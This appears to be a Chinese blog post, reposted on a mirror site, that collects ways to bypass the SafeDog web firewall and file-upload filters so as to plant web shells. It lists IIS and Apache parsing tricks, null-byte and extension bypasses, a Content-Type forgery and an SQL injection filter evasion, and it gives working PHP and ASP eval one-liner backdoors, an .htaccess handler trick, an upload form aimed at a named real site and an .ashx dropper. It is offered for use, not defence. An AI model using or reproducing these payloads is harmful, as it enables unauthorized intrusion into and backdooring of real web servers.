zoukankan      html  css  js  c++  java
  • 突破各种安全软件 安全狗 继续渗透 上传

    抓包修改数据为:IIS忽略冒号后面格式 cs.asp:.jpg

    火狐FIREBUG修改本地JS

    upfile/upfile_other.asp upfile_photo.asp upfile_flash.asp

    asa cer asaspp

    隐藏表单,hidden修改数据,file

    00 1.asp;.jpg

    十六进制00: 1.asp

    双文件上传

    文件名大小写突破,对于LINUX等非WINDOWS系统

    asp空格

    asp.

    /xx.jpg%00.php

    cecerr aasasa

    Content-Type: image/gif (原为 Content-Type: text/plain)

    上传一个shtml文件, 内容为: <!--#include file="conn.asp"--> 直接查看源文件,找数据库,然后...

    apache的解析漏洞(上传1.php.hack,因为hack非法后缀,所以直接当作php执行了.

    文件名为www.xxx.com/1.asp;1.jpg。这样的会被IIS安全狗果断屏蔽。改成如下名称,IIS6一样会解析:www.xxx.com/;1.asp;1.jpg


    常用的如seo.asp?id=1 and 1=1 是会被安全狗屏蔽的。但如果:seo.asp?seo.com=%00.&id=69%20 and 1=1

    利用.htaccess突破限制:

    1.首先上传.htaccess文件到某目录下,.htacess规则:

    <FilesMatch "hahahe">
    SetHandler application/x-httpd-php
    </FilesMatch>

    2.再上传一个文件,后缀任意写,内容:

    "hahahe"<?php @eval($_POST['dukong']);?>

    双文件上传突破:

    <form action="http://www.syxldwgy.com/upfile_Other.asp " method="post" name="form1" enctype="multipart/form-data">
    <input name="FileName1" type="FILE" class="tx1" size="20">
    <input name="FileName2" type="FILE" class="tx1" size="20">
    <input type="submit" name="Submit" value="上传">
    </form>
    View Code

    .ashx文件.NET 生成root.asp一句话马:

    <%@ WebHandler Language="C#" Class="Handler" %>
    
    using System;
    using System.Web;
    using System.IO;
    public class Handler : IHttpHandler {
        
        public void ProcessRequest (HttpContext context) {
            context.Response.ContentType = "text/plain";
            
            StreamWriter file1= File.CreateText(context.Server.MapPath("root.asp"));
            file1.Write("<%eval request("mima")%>");
            file1.Flush();
            file1.Close();
            
        }
    
        public bool IsReusable {
            get {
                return false;
            }
        }
    
    }
    View Code
  • 相关阅读:
    接口测试(apipost、jmeter和python脚本)
    接口测试人员需要掌握的知识技能
    使用抓包工具fiddler和apipost进行接口测试
    接口工具使用对比(apipost、jmeter、postman、swagger等)
    如何获取变量token的值
    接口文档生成工具apipost
    (Win10 应用中心打不开) Microsoft store 无法联网
    判断当前系统是64位还是32位
    VS2017 远程调试方法
    基于COM组件接口ICMLuaUtil的BypassUAC
  • 原文地址:https://www.cnblogs.com/qunshu/p/3286593.html
Copyright © 2011-2022 走看看